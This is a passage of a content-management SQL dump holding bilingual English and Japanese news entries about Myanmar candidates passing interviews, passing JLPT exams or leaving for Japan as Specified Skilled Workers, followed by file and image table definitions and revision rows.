('activities', 0, 164, 629, 'ja', 0, '<p>SU MYAT WIN さんが2026年6月14日に特定技能（宿泊）として日本へ出発されました。</p>', '', 'full_html'),
('activities', 0, 165, 630, 'en', 0, '<p>Four candidates successfully departed for Japan on 3 June 2026 to begin their careers under the Specified Skilled Worker (Kaigo) Program.</p>', '', 'full_html'),
('activities', 0, 165, 631, 'en', 0, '<p>Four candidates successfully departed for Japan on 3 June 2026 to begin their careers under the Specified Skilled Worker (Kaigo) Program.</p>', '', 'full_html'),
('activities', 0, 165, 631, 'ja', 0, '<p data-start=\"1146\" data-end=\"1189\"><strong data-start=\"1146\" data-end=\"1189\">2026年6月3日、4名の候補者が特定技能（介護）として日本へ出発されました。</strong></p>', '', 'full_html'),
('activities', 0, 166, 632, 'ja', 0, '<p><strong>Ms. Thu Thu Aung successfully passed the interview for a Specified Skilled Worker (Hotel) position in Japan.</strong></p><h3>&nbsp;</h3>', '', 'full_html'),
('activities', 0, 166, 633, 'en', 0, '<p><strong>Ms. Thu Thu Aung successfully passed the interview for a Specified Skilled Worker (Hotel) position in Japan.</strong></p><h3>&nbsp;</h3>', '', 'full_html'),
('activities', 0, 166, 634, 'en', 0, '<p><strong>Ms. Thu Thu Aung successfully passed the interview for a Specified Skilled Worker (Hotel) position in Japan.</strong></p><h3>&nbsp;</h3>', '', 'full_html'),
('activities', 0, 166, 634, 'ja', 0, '<p><strong>THU THU AUNG さんが特定技能（宿泊）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 167, 635, 'en', 0, '<p>Four candidates successfully departed for Japan on 23 April 2026 under the Specified Skilled Worker (Food Service) Program.</p>', '', 'full_html'),
('activities', 0, 167, 636, 'en', 0, '<p>Four candidates successfully departed for Japan on 23 April 2026 under the Specified Skilled Worker (Food Service) Program.</p>', '', 'full_html'),
('activities', 0, 167, 636, 'ja', 0, '<p>2026年4月23日、4名の候補者が特定技能（外食業）として日本へ出発されました。</p>', '', 'full_html'),
('activities', 0, 168, 637, 'en', 0, '<p>Ms. Win Htet Htet Aung successfully passed the interview for a Specified Skilled Worker (Hotel) position in Japan.</p>', '', 'full_html'),
('activities', 0, 168, 638, 'en', 0, '<p>Ms. Win Htet Htet Aung successfully passed the interview for a Specified Skilled Worker (Hotel) position in Japan.</p>', '', 'full_html'),
('activities', 0, 168, 638, 'ja', 0, '<p>WIN HTET HTET AUNG さんが特定技能（宿泊）の採用面接に合格されました。</p>', '', 'full_html'),
('activities', 0, 169, 639, 'en', 0, '<p><strong>Three candidates successfully departed for Japan on 10 May 2026 under the Specified Skilled Worker (Kaigo) Program.</strong></p>', '', 'full_html'),
('activities', 0, 169, 640, 'en', 0, '<p><strong>Three candidates successfully departed for Japan on 10 May 2026 under the Specified Skilled Worker (Kaigo) Program.</strong></p>', '', 'full_html'),
('activities', 0, 169, 640, 'ja', 0, '<p><strong>2026年5月10日、3名の候補者が特定技能（介護）として日本へ出発されました。</strong></p>', '', 'full_html'),
('activities', 0, 170, 641, 'en', 0, '<p><strong>Ms. Aye Aye Myint successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 170, 642, 'en', 0, '<p><strong>Ms. Aye Aye Myint successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 170, 642, 'ja', 0, '<p><strong>AYE AYE MYINT さんが特定技能（介護）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 171, 643, 'en', 0, '<p><strong>Ms. May Phyoe Thu successfully departed for Japan on 26 April 2026 under the Specified Skilled Worker (Kaigo) Program.</strong></p>', '', 'full_html'),
('activities', 0, 171, 644, 'en', 0, '<p><strong>Ms. May Phyoe Thu successfully departed for Japan on 26 April 2026 under the Specified Skilled Worker (Kaigo) Program.</strong></p>', '', 'full_html'),
('activities', 0, 171, 644, 'ja', 0, '<p><strong>MAY PHYOE THU さんが2026年4月26日に特定技能（介護）として日本へ出発されました</strong></p>', '', 'full_html'),
('activities', 0, 173, 647, 'en', 0, '<p><strong>Nine candidates departed for Japan on 22 April 2026 under the Specified Skilled Worker (Food Service) Program.</strong></p>', '', 'full_html'),
('activities', 0, 173, 648, 'en', 0, '<p><strong>Nine candidates departed for Japan on 22 April 2026 under the Specified Skilled Worker (Food Service) Program.</strong></p>', '', 'full_html'),
('activities', 0, 173, 648, 'ja', 0, '<p><strong>2026年4月22日、9名の候補者が特定技能（外食業）として日本へ出発されました。</strong></p>', '', 'full_html'),
('activities', 0, 174, 649, 'en', 0, '<p>Ms. Shwe Zin Phyo successfully departed for Japan on 1 April 2026 under the Specified Skilled Worker (Food Service) Program.</p>', '', 'full_html'),
('activities', 0, 174, 650, 'en', 0, '<p>Ms. Shwe Zin Phyo successfully departed for Japan on 1 April 2026 under the Specified Skilled Worker (Food Service) Program.</p>', '', 'full_html'),
('activities', 0, 174, 650, 'ja', 0, '<p>SHWE ZIN PHYO さんが2026年4月1日に特定技能（外食業）として日本へ出発されました</p>', '', 'full_html'),
('activities', 0, 175, 651, 'en', 0, '<p>Ms. Win Win Thu successfully departed for Japan on 29 March 2026 under the Specified Skilled Worker (Food Service) Program.</p>', '', 'full_html'),
('activities', 0, 175, 652, 'en', 0, '<p>Ms. Win Win Thu successfully departed for Japan on 29 March 2026 under the Specified Skilled Worker (Food Service) Program.</p>', '', 'full_html'),
('activities', 0, 175, 652, 'ja', 0, '<p>WIN WIN THU さんが2026年3月29日に特定技能（外食業）として日本へ出発されました</p>', '', 'full_html'),
('activities', 0, 176, 653, 'en', 0, '<p>Two candidates successfully departed for Japan on 5 March 2026 under the Specified Skilled Worker (Food Service) Program.</p>', '', 'full_html'),
('activities', 0, 176, 654, 'en', 0, '<p>Two candidates successfully departed for Japan on 5 March 2026 under the Specified Skilled Worker (Food Service) Program.</p>', '', 'full_html'),
('activities', 0, 176, 654, 'ja', 0, '<p>2026年3月5日、2名の候補者が特定技能（外食業）として日本へ出発されました。</p>', '', 'full_html'),
('activities', 0, 177, 655, 'en', 0, '<p>Ms. Tun Eaindra Moe successfully departed for Japan on 12 February 2026 under the Specified Skilled Worker (Food Service) Program.</p>', '', 'full_html'),
('activities', 0, 177, 656, 'en', 0, '<p>Ms. Tun Eaindra Moe successfully departed for Japan on 12 February 2026 under the Specified Skilled Worker (Food Service) Program.</p>', '', 'full_html'),
('activities', 0, 177, 656, 'ja', 0, '<p>TUN EAINDRA MOE さんが2026年2月12日に特定技能（外食業）として日本へ出発されました。</p>', '', 'full_html'),
('activities', 0, 178, 661, 'en', 0, '<p>Ms. Phyo Thiri Htet successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</p>', '', 'full_html'),
('activities', 0, 178, 662, 'en', 0, '<p>Ms. Phyo Thiri Htet successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</p>', '', 'full_html'),
('activities', 0, 178, 662, 'ja', 0, '<p>PHYO THIRI HTET さんが特定技能（介護）の採用面接に合格されました。</p>', '', 'full_html'),
('activities', 0, 179, 663, 'en', 0, '<p>Ms. Myat Thandar Kyaw successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p>', '', 'full_html'),
('activities', 0, 179, 664, 'en', 0, '<p>Ms. Myat Thandar Kyaw successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p>', '', 'full_html'),
('activities', 0, 179, 664, 'ja', 0, '<p>MYAT THANDAR KYAW さんが特定技能（外食業）の採用面接に合格されました。</p>', '', 'full_html'),
('activities', 0, 180, 665, 'ja', 0, '<p>Ms. Hsu Wyne Wyne Pyae successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p>', '', 'full_html'),
('activities', 0, 180, 666, 'en', 0, '<p>Ms. Hsu Wyne Wyne Pyae successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p>', '', 'full_html'),
('activities', 0, 180, 667, 'en', 0, '<p>Ms. Hsu Wyne Wyne Pyae successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p>', '', 'full_html'),
('activities', 0, 180, 667, 'ja', 0, '<p>HSU WYNE WYNE PYAE さんが特定技能（外食業）の採用面接に合格されました。</p>', '', 'full_html'),
('activities', 0, 181, 668, 'en', 0, '<p>Ms. Su Su San successfully passed the JLPT N3 Examination after completing N5, N4, and N3 studies at New Comet Language Center.</p>', '', 'full_html'),
('activities', 0, 181, 669, 'en', 0, '<p>Ms. Su Su San successfully passed the JLPT N3 Examination after completing N5, N4, and N3 studies at New Comet Language Center.</p>', '', 'full_html'),
('activities', 0, 181, 669, 'ja', 0, '<p>SU SU SAN さんがニューコメット日本語学校で学習し、JLPT N3試験に合格されました。</p>', '', 'full_html'),
('activities', 0, 182, 670, 'en', 0, '<p data-start=\"205\" data-end=\"335\"><strong data-start=\"205\" data-end=\"335\">Ms. Aye Thazin successfully passed the JLPT N3 Examination after studying N5, N4, and N3 courses at New Comet Language Center.</strong></p>', '', 'full_html'),
('activities', 0, 182, 671, 'en', 0, '<p data-start=\"205\" data-end=\"335\"><strong data-start=\"205\" data-end=\"335\">Ms. Aye Thazin successfully passed the JLPT N3 Examination after studying N5, N4, and N3 courses at New Comet Language Center.</strong></p>', '', 'full_html'),
('activities', 0, 182, 671, 'ja', 0, '<p data-start=\"205\" data-end=\"335\"><strong data-start=\"205\" data-end=\"335\">AYE THAZIN さんがニューコメット日本語学校で学習し、JLPT N3試験に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 183, 672, 'en', 0, '<p data-start=\"238\" data-end=\"377\"><strong data-start=\"238\" data-end=\"377\">Ms. Aye Pwint Phyu successfully passed the JLPT N3 Examination after completing Japanese language studies at New Comet Language Center.</strong></p>', '', 'full_html'),
('activities', 0, 183, 673, 'en', 0, '<p data-start=\"238\" data-end=\"377\"><strong data-start=\"238\" data-end=\"377\">Ms. Aye Pwint Phyu successfully passed the JLPT N3 Examination after completing Japanese language studies at New Comet Language Center.</strong></p>', '', 'full_html'),
('activities', 0, 183, 673, 'ja', 0, '<p data-start=\"238\" data-end=\"377\"><strong data-start=\"238\" data-end=\"377\">AYE PWINT PHYU さんがニューコメット日本語学校で学習し、JLPT N3試験に合格されました</strong></p>', '', 'full_html'),
('activities', 0, 184, 674, 'en', 0, '<p>Ms. Ei Ei Phyoe and Ms. Moe Moe Zaw departed for Japan on 26 January 2026 under the Specified Skilled Worker (Food Service) Program.</p>', '', 'full_html'),
('activities', 0, 184, 675, 'en', 0, '<p>Ms. Ei Ei Phyoe and Ms. Moe Moe Zaw departed for Japan on 26 January 2026 under the Specified Skilled Worker (Food Service) Program.</p>', '', 'full_html'),
('activities', 0, 184, 675, 'ja', 0, '<p>EI EI PHYOE さんと MOE MOE ZAW さんが2026年1月26日に特定技能（外食業）として日本へ出発されました。</p>', '', 'full_html'),
('activities', 0, 185, 676, 'en', 0, '<p>Ms. Hnin Wa Than successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p>', '', 'full_html'),
('activities', 0, 185, 677, 'en', 0, '<p>Ms. Hnin Wa Than successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p>', '', 'full_html'),
('activities', 0, 185, 678, 'en', 0, '<p>Ms. Hnin Wa Than successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p>', '', 'full_html'),
('activities', 0, 185, 678, 'ja', 0, '<p data-start=\"1220\" data-end=\"1263\"><strong data-start=\"1220\" data-end=\"1263\">HNIN WA THAN さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 186, 679, 'en', 0, '<p>Ms. Yadana Lwin successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p>', '', 'full_html'),
('activities', 0, 186, 680, 'en', 0, '<p>Ms. Yadana Lwin successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p>', '', 'full_html'),
('activities', 0, 186, 680, 'ja', 0, '<p>YADANA LWIN さんが特定技能（外食業）の採用面接に合格されました。</p>', '', 'full_html'),
('activities', 0, 187, 681, 'en', 0, '<p data-start=\"260\" data-end=\"380\"><strong data-start=\"260\" data-end=\"380\">Ms. Khit Yuya Soe successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 187, 682, 'en', 0, '<p data-start=\"260\" data-end=\"380\"><strong data-start=\"260\" data-end=\"380\">Ms. Khit Yuya Soe successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 187, 682, 'ja', 0, '<p data-start=\"260\" data-end=\"380\"><strong data-start=\"260\" data-end=\"380\">KHIT YUYA SOE さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 188, 683, 'en', 0, '<p>Ms. May Phyoe Thu successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</p>', '', 'full_html'),
('activities', 0, 188, 684, 'en', 0, '<p>Ms. May Phyoe Thu successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</p>', '', 'full_html'),
('activities', 0, 188, 684, 'ja', 0, '<p>MAY PHYOE THU さんが特定技能（介護）の採用面接に合格されました。</p>', '', 'full_html'),
('activities', 0, 189, 685, 'en', 0, '<p data-start=\"229\" data-end=\"341\"><strong data-start=\"229\" data-end=\"341\">Ms. Thet Mon Soe successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 189, 686, 'en', 0, '<p data-start=\"229\" data-end=\"341\"><strong data-start=\"229\" data-end=\"341\">Ms. Thet Mon Soe successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 189, 686, 'ja', 0, '<p data-start=\"229\" data-end=\"341\"><strong data-start=\"229\" data-end=\"341\">THET MON SOE さんが特定技能（介護）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 190, 687, 'en', 0, '<p data-start=\"241\" data-end=\"361\"><strong data-start=\"241\" data-end=\"361\">Ms. Wai Mon Thant successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 190, 688, 'en', 0, '<p data-start=\"241\" data-end=\"361\"><strong data-start=\"241\" data-end=\"361\">Ms. Wai Mon Thant successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 190, 688, 'ja', 0, '<p data-start=\"241\" data-end=\"361\"><strong data-start=\"241\" data-end=\"361\">WAI MON THANT さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 190, 689, 'en', 0, '<p data-start=\"241\" data-end=\"361\"><strong data-start=\"241\" data-end=\"361\">Ms. Wai Mon Thant successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 190, 689, 'ja', 0, '<p data-start=\"241\" data-end=\"361\"><strong data-start=\"241\" data-end=\"361\">WAI MON THANT さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 191, 690, 'en', 0, '<p data-start=\"255\" data-end=\"372\"><strong data-start=\"255\" data-end=\"372\">Ms. Ei Ei Khet successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p><h3 data-start=\"374\" data-end=\"390\">&nbsp;</h3>', '', 'full_html'),
('activities', 0, 191, 691, 'en', 0, '<p data-start=\"255\" data-end=\"372\"><strong data-start=\"255\" data-end=\"372\">Ms. Ei Ei Khet successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p><h3 data-start=\"374\" data-end=\"390\">&nbsp;</h3>', '', 'full_html'),
('activities', 0, 191, 691, 'ja', 0, '<p><strong data-start=\"255\" data-end=\"372\">EI EI KHET さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 192, 692, 'en', 0, '<p>Ms. Sabi Oo successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p>', '', 'full_html'),
('activities', 0, 192, 693, 'en', 0, '<p>Ms. Sabi Oo successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p>', '', 'full_html'),
('activities', 0, 192, 693, 'ja', 0, '<p data-start=\"1161\" data-end=\"1199\"><strong data-start=\"1161\" data-end=\"1199\">SABI OO さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 193, 694, 'en', 0, '<p data-start=\"239\" data-end=\"361\"><strong data-start=\"239\" data-end=\"361\">Ms. Thwel Thwel Aye successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 193, 695, 'en', 0, '<p data-start=\"239\" data-end=\"361\"><strong data-start=\"239\" data-end=\"361\">Ms. Thwel Thwel Aye successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 193, 695, 'ja', 0, '<p data-start=\"239\" data-end=\"361\"><strong data-start=\"239\" data-end=\"361\">THWEL THWEL AYE さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 193, 696, 'en', 0, '<p data-start=\"239\" data-end=\"361\"><strong data-start=\"239\" data-end=\"361\">Ms. Thwel Thwel Aye successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 193, 696, 'ja', 0, '<p data-start=\"239\" data-end=\"361\"><strong data-start=\"239\" data-end=\"361\">THWEL THWEL AYE さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 194, 697, 'en', 0, '<p data-start=\"228\" data-end=\"346\"><strong data-start=\"228\" data-end=\"346\">Ms. Moe Moe Zaw successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 194, 698, 'en', 0, '<p data-start=\"228\" data-end=\"346\"><strong data-start=\"228\" data-end=\"346\">Ms. Moe Moe Zaw successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 194, 698, 'ja', 0, '<p data-start=\"228\" data-end=\"346\"><strong data-start=\"228\" data-end=\"346\">MOE MOE ZAW さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 195, 699, 'en', 0, '<p>Ms. Ei Ei Phyoe successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p>', '', 'full_html'),
('activities', 0, 195, 700, 'en', 0, '<p>Ms. Ei Ei Phyoe successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p>', '', 'full_html'),
('activities', 0, 195, 700, 'ja', 0, '<p>EI EI PHYOE さんが特定技能（外食業）の採用面接に合格されました。</p>', '', 'full_html'),
('activities', 0, 196, 701, 'en', 0, '<p data-start=\"210\" data-end=\"328\"><strong data-start=\"210\" data-end=\"328\">Ms. Win Win Thu successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 196, 702, 'en', 0, '<p data-start=\"210\" data-end=\"328\"><strong data-start=\"210\" data-end=\"328\">Ms. Win Win Thu successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 196, 702, 'ja', 0, '<p data-start=\"1203\" data-end=\"1245\"><strong data-start=\"1203\" data-end=\"1245\">WIN WIN THU さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 197, 703, 'en', 0, '<p data-start=\"178\" data-end=\"300\"><strong data-start=\"178\" data-end=\"300\">Ms. Tun Eaindar Moe successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 197, 704, 'en', 0, '<p data-start=\"178\" data-end=\"300\"><strong data-start=\"178\" data-end=\"300\">Ms. Tun Eaindar Moe successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 197, 704, 'ja', 0, '<p data-start=\"178\" data-end=\"300\"><strong data-start=\"178\" data-end=\"300\">TUN EAINDAR MOE さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 198, 705, 'en', 0, '<p>Ms. Mai Thandar Naing successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p>', '', 'full_html'),
('activities', 0, 198, 706, 'en', 0, '<p>Ms. Mai Thandar Naing successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p>', '', 'full_html'),
('activities', 0, 198, 706, 'ja', 0, '<p>MAI THANDAR NAING さんが特定技能（外食業）の採用面接に合格されました。</p>', '', 'full_html'),
('activities', 0, 199, 707, 'en', 0, '<p data-start=\"172\" data-end=\"290\"><strong data-start=\"172\" data-end=\"290\">Ms. Ei Zin Htwe successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 199, 708, 'en', 0, '<p data-start=\"172\" data-end=\"290\"><strong data-start=\"172\" data-end=\"290\">Ms. Ei Zin Htwe successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 199, 708, 'ja', 0, '<p data-start=\"172\" data-end=\"290\"><strong data-start=\"172\" data-end=\"290\">EI ZIN HTWE さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 200, 709, 'en', 0, '<p data-start=\"187\" data-end=\"310\"><strong data-start=\"187\" data-end=\"310\">Ms. Htay Htay Khaing successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 200, 710, 'en', 0, '<p data-start=\"187\" data-end=\"310\"><strong data-start=\"187\" data-end=\"310\">Ms. Htay Htay Khaing successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 200, 710, 'ja', 0, '<p data-start=\"187\" data-end=\"310\"><strong data-start=\"187\" data-end=\"310\">HTAY HTAY KHAING さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html');

-- --------------------------------------------------------

--
-- Table structure for table `node_revision__field_activities_download_file`
--

CREATE TABLE `node_revision__field_activities_download_file` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_activities_download_file_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the file entity.',
  `field_activities_download_file_display` tinyint UNSIGNED DEFAULT '1' COMMENT 'Flag to control whether this file should be displayed when viewing content.',
  `field_activities_download_file_description` text COMMENT 'A description of the file.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Revision archive storage for node field field_activities…';

-- --------------------------------------------------------

--
-- Table structure for table `node_revision__field_activities_img`
--

CREATE TABLE `node_revision__field_activities_img` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_activities_img_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the file entity.',
  `field_activities_img_alt` varchar(512) DEFAULT NULL COMMENT 'Alternative image text, for the image''s ''alt'' attribute.',
  `field_activities_img_title` varchar(1024) DEFAULT NULL COMMENT 'Image title text, for the image''s ''title'' attribute.',
  `field_activities_img_width` int UNSIGNED DEFAULT NULL COMMENT 'The width of the image in pixels.',
  `field_activities_img_height` int UNSIGNED DEFAULT NULL COMMENT 'The height of the image in pixels.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Revision archive storage for node field field_activities…';

--
-- Dumping data for table `node_revision__field_activities_img`
--

INSERT INTO `node_revision__field_activities_img` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `field_activities_img_target_id`, `field_activities_img_alt`, `field_activities_img_title`, `field_activities_img_width`, `field_activities_img_height`) VALUES
('activities', 0, 6, 11, 'en', 0, 11, '', '', 1280, 969),
('activities', 0, 6, 21, 'en', 0, 11, '', '', 1280, 969),
('activities', 0, 6, 24, 'en', 0, 11, '', '', 1280, 969),
('activities', 0, 6, 33, 'en', 0, 11, '', '', 1280, 969),
('activities', 0, 6, 45, 'en', 0, 11, '', '', 1280, 969),
('activities', 0, 6, 115, 'en', 0, 11, '', '', 1280, 969),
('activities', 0, 6, 115, 'ja', 0, 11, '', '', 1280, 969),
('activities', 0, 6, 116, 'en', 0, 11, '', '', 1280, 969),
('activities', 0, 6, 116, 'ja', 0, 11, '', '', 1280, 969),
('activities', 0, 6, 116, 'ko', 0, 11, '', '', 1280, 969),
('activities', 0, 6, 151, 'en', 0, 11, '', '', 1280, 969),
('activities', 0, 6, 151, 'ja', 0, 11, '', '', 1280, 969),
('activities', 0, 6, 151, 'ko', 0, 11, '', '', 1280, 969),
('activities', 0, 6, 214, 'en', 0, 11, '', '', 1280, 969),
('activities', 0, 6, 214, 'ja', 0, 11, '', '', 1280, 969),
('activities', 0, 6, 214, 'ko', 0, 11, '', '', 1280, 969),
('activities', 0, 7, 12, 'en', 0, 12, '', '', 499, 370),
('activities', 0, 7, 46, 'en', 0, 12, '', '', 499, 370),
('activities', 0, 7, 117, 'en', 0, 12, '', '', 499, 370),
('activities', 0, 7, 117, 'ja', 0, 12, '', '', 499, 370),
('activities', 0, 7, 118, 'en', 0, 12, '', '', 499, 370),
('activities', 0, 7, 118, 'ja', 0, 12, '', '', 499, 370),
('activities', 0, 7, 118, 'ko', 0, 12, '', '', 499, 370),
('activities', 0, 7, 153, 'en', 0, 12, '', '', 499, 370),
('activities', 0, 7, 153, 'ja', 0, 12, '', '', 499, 370),
('activities', 0, 7, 153, 'ko', 0, 12, '', '', 499, 370),
('activities', 0, 7, 154, 'en', 0, 12, '', '', 499, 370),
('activities', 0, 7, 154, 'ja', 0, 12, '', '', 499, 370),
('activities', 0, 7, 154, 'ko', 0, 12, '', '', 499, 370),
('activities', 0, 7, 216, 'en', 0, 12, '', '', 499, 370),
('activities', 0, 7, 216, 'ja', 0, 12, '', '', 499, 370),
('activities', 0, 7, 216, 'ko', 0, 12, '', '', 499, 370),
('activities', 0, 7, 288, 'en', 0, 12, '', '', 499, 370),
('activities', 0, 7, 288, 'ja', 0, 12, '', '', 499, 370),
('activities', 0, 7, 288, 'ko', 0, 12, '', '', 499, 370),
('activities', 0, 8, 13, 'en', 0, 13, '', '', 460, 614),
('activities', 0, 8, 23, 'en', 0, 13, '', '', 460, 614),
('activities', 0, 8, 110, 'en', 0, 13, '', '', 460, 614),
('activities', 0, 8, 110, 'ja', 0, 13, '', '', 460, 614),
('activities', 0, 8, 111, 'en', 0, 13, '', '', 460, 614),
('activities', 0, 8, 111, 'ja', 0, 13, '', '', 460, 614),
('activities', 0, 8, 111, 'ko', 0, 13, '', '', 460, 614),
('activities', 0, 8, 112, 'en', 0, 13, '', '', 460, 614),
('activities', 0, 8, 112, 'ja', 0, 13, '', '', 460, 614),
('activities', 0, 8, 112, 'ko', 0, 13, '', '', 460, 614),
('activities', 0, 8, 113, 'en', 0, 13, '', '', 460, 614),
('activities', 0, 8, 113, 'ja', 0, 13, '', '', 460, 614),
('activities', 0, 8, 113, 'ko', 0, 13, '', '', 460, 614),
('activities', 0, 8, 114, 'en', 0, 13, '', '', 460, 614),
('activities', 0, 8, 114, 'ja', 0, 13, '', '', 460, 614),
('activities', 0, 8, 114, 'ko', 0, 13, '', '', 460, 614),
('activities', 0, 8, 152, 'en', 0, 13, '', '', 460, 614),
('activities', 0, 8, 152, 'ja', 0, 13, '', '', 460, 614),
('activities', 0, 8, 152, 'ko', 0, 13, '', '', 460, 614),
('activities', 0, 8, 215, 'en', 0, 13, '', '', 460, 614),
('activities', 0, 8, 215, 'ja', 0, 13, '', '', 460, 614),
('activities', 0, 8, 215, 'ko', 0, 13, '', '', 460, 614),
('activities', 0, 9, 14, 'en', 0, 15, '', '', 1280, 1340),
('activities', 0, 9, 15, 'en', 0, 16, '', '', 1500, 1000),
('activities', 0, 9, 34, 'en', 0, 16, '', '', 1500, 1000),
('activities', 0, 9, 44, 'en', 0, 16, '', '', 1500, 1000),
('activities', 0, 9, 62, 'en', 0, 16, '', '', 1500, 1000),
('activities', 0, 9, 121, 'en', 0, 16, '', '', 1500, 1000),
('activities', 0, 9, 121, 'ja', 0, 16, '', '', 1500, 1000),
('activities', 0, 9, 122, 'en', 0, 16, '', '', 1500, 1000),
('activities', 0, 9, 122, 'ja', 0, 16, '', '', 1500, 1000),
('activities', 0, 9, 122, 'ko', 0, 16, '', '', 1500, 1000),
